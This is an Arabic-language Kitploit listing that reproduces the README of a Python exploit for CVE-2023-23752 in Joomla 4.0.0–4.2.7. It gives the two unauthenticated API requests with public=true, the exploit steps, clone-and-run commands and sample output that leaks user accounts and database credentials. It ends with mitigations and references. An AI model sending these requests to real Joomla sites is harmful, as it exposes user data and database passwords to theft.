Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-23752 — نسخة بايثون من استغلال CVE-2023-23752 — كشف معلومات غير مصادق عليه في Joomla! < 4.2.8 (قائمة المستخدمين + تسريب بيانات اعتماد قاعدة البيانات) | Kitploit
أدوات/GitHubGitHub/bardlaudian/cve-2023-23752
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubbardlaudian/cve-2023-23752

CVE-2023-23752

نسخة بايثون من استغلال CVE-2023-23752 — كشف معلومات غير مصادق عليه في Joomla! < 4.2.8 (قائمة المستخدمين + تسريب بيانات اعتماد قاعدة البيانات)

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-23752 — Joomla! < 4.2.8 كشف معلومات بدون مصادقة

Python CVE Platform

⚠️ إخلاء مسؤولية: هذه الأداة مخصّصة للأغراض التعليمية واختبار الاختراق المصرّح به فقط. استخدمها فقط ضد أنظمة تمتلكها أو لديك إذن كتابي صريح لاختبارها. الاستخدام غير المصرّح به غير قانوني.


جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • كيف تعمل
  • المتطلبات
  • التثبيت
  • الاستخدام
  • أمثلة
  • الإجراءات الوقائية
  • الاعتمادات
  • المراجع

نظرة عامة

Joomla! هو أحد أكثر أنظمة إدارة المحتوى (CMS) مفتوحة المصدر استخدامًا على نطاق واسع. تُعرّض الإصدارات 4.0.0 إلى 4.2.7 نقطتي نهاية API دون تحكّم مناسب في الوصول، مما يسمح لمهاجم غير مصادَق باسترجاع معلومات حساسة: حسابات المستخدمين المسجّلين، وفي التهيئات الهشّة، بيانات اعتماد قاعدة بيانات الموقع.

اكتُشفت الثغرة بواسطة Zewei Zhang من مختبر NSFOCUS TIANJI وتم الإبلاغ عنها لمشروع Joomla!، الذي أصدر تصحيحًا في الإصدار 4.2.8. وقد حُصّلت على الترقيم CVE-2023-23752.

يحتوي هذا المستودع على نسخة Python من الاستغلال الأصلي المكتوب بلغة Ruby والذي نشرته ACCEIS.


تفاصيل الثغرة


كيف تعمل

من المفترض أن تفرض نقاط نهاية خدمة REST API في Joomla تحقّقًا من المصادقة والوصول قبل إرجاع البيانات. في الإصدارات المتأثرة، تفشل نقطتا نهاية في إجراء هذا التحقّق بشكل صحيح عند استدعائهما بمعامل الاستعلام public=true، حيث تعاملان الطلب كما لو كان صادرًا من مستوى وصول "عام" مجهول يفترض أن يُظهر بيانات غير حساسة فقط — ولكن بدلًا من ذلك تتسرّب معلومات داخلية.

نقاط النهاية المتأثرة

root@kitploit:~
GET /api/index.php/v1/users?public=true
GET /api/index.php/v1/config/application?public=true
  • ترجع نقطة نهاية users القائمة الكاملة للحسابات المسجّلة: المعرّف، الاسم المعروض، اسم المستخدم، البريد الإلكتروني، وعضوية المجموعات.
  • ترجع نقطة نهاية config إعدادات التطبيق، بما في ذلك — عندما لا تتم إزالة أو تقوية برنامج التثبيت — مضيف قاعدة البيانات واسم المستخدم وكلمة المرور واسم قاعدة البيانات والبادئة وإعدادات التشفير.

تسلسل الاستغلال

يقوم السكربت بأتمتة الخطوات التالية:

root@kitploit:~
1. Send GET request to /api/index.php/v1/users?public=true
2. Parse the JSON:API response and extract user records
3. Send GET request to /api/index.php/v1/config/application?public=true
4. Parse the JSON:API response and extract site + database configuration
5. Print both datasets to the console

لا يتطلب الأمر أي مصادقة أو جلسة أو رمز CSRF في أي مرحلة — فالهجوم بأكمله عبارة عن طلبيّ GET غير مصادَقين.


المتطلبات

  • Python 3.8+
  • requests
root@kitploit:~
pip install requests --break-system-packages

التثبيت

root@kitploit:~
git clone https://github.com/BardLaudian/CVE-2023-23752.git
cd CVE-2023-23752
pip install requests --break-system-packages

الاستخدام

root@kitploit:~
usage: CVE-2023-23752.py [-h] url

positional arguments:
  url         Base URL of the target, e.g. http://dev.devvortex.htb

options:
  -h, --help  show this help message and exit

أمثلة

الاستخدام الأساسي

root@kitploit:~
python3 CVE-2023-23752.py http://127.0.0.1:4242

ضد هدف بأسلوب HTB

root@kitploit:~
python3 CVE-2023-23752.py http://dev.devvortex.htb

مخرجات نموذجية

root@kitploit:~
=== Users ===
  [123] Administrator (admin) - [email protected] - ['Super Users']

=== Site info ===
  Site name: My Site
  Editor: tinymce
  Captcha: 0
  Access: 1
  Debug status: False

=== Database info ===
  DB type: mysqli
  DB host: localhost
  DB user: joomla_user
  DB password: ********
  DB name: joomla_db
  DB prefix: sd8f2_
  DB encryption: 0

الإجراءات الوقائية

  • حدِّث Joomla! إلى الإصدار 4.2.8 أو أحدث — هذا هو الإصلاح الكامل الوحيد.
  • قيّد الوصول إلى /api/index.php/* على مستوى خادم الويب أو جدار الحماية WAF إذا لم يكن الترقية ممكنة فورًا.
  • بدّل بيانات الاعتماد لأي حسابات أو مستخدمي قاعدة بيانات ربما تعرّضت عبر هذه النقطة قبل التصحيح.
  • راقب سجلات الوصول بحثًا عن طلبات غير مصادق عليها إلى مسارات خدمة الويب /api/index.php/v1/.

الاعتمادات

  • اكتشاف الثغرة: Zewei Zhang، مختبر NSFOCUS TIANJI
  • الاستغلال الأصلي (Ruby): noraj (Alexandre ZANNI) لصالح ACCEIS — المستودع الأصلي
  • نسخة Python: Bardlaudian

المراجع

  • NVD — CVE-2023-23752
  • Exploit-DB — EDB-51334
  • نشرة PacketStorm
  • نشرة Joomla! الأمنية
  • نشرة المكتشف — NSFOCUS
  • الاستغلال الأصلي بلغة Ruby — Acceis
تنزيل الأداة
FieldValue
CVECVE-2023-23752
AffectedJoomla! 4.0.0 – 4.2.7
Typeتحكّم غير صحيح في الوصول / كشف معلومات
Privilegesلا شيء (بدون مصادقة)
Impactكشف حسابات المستخدمين وبيانات اعتماد قاعدة البيانات
PatchJoomla! 4.2.8 (صدر في 2023)